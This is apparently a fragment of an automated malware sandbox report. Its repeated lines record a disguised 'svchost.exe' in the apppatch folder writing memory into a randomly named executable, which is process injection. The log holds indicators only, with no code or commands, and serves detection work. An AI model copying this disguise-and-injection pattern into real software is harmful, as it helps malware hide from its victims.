Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: AC2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1040000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1041000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1042000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1092000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 11C0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 11C1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 11C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1212000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1500000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1501000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1502000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1552000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1420000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1421000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1422000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1472000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1550000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1551000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1552000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 15A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 770000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 771000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 772000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 7C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DB0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DB1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DB2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: E02000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BF0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BF1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BF2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1460000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1461000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1462000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14B2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 10F0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 10F1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 10F2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1142000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 800000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 801000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 802000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 852000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A10000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A11000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A12000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A62000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 12A0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 12A1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 12A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 12F2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: F90000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: F91000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: F92000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: FE2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1120000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1121000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1122000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1172000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B50000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B51000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B52000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 13A0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 13A1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 13A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 13F2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 10C0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 10C1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 10C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1112000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: FB0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: FB1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: FB2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1002000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D20000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D21000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D22000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D72000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1030000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1031000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1032000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1082000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1210000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1211000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1212000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1262000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: AC0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: AC1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: AC2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B12000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 8D0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 8D1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 8D2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 922000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 620000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 621000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 622000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 672000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A40000	Jump to behavior
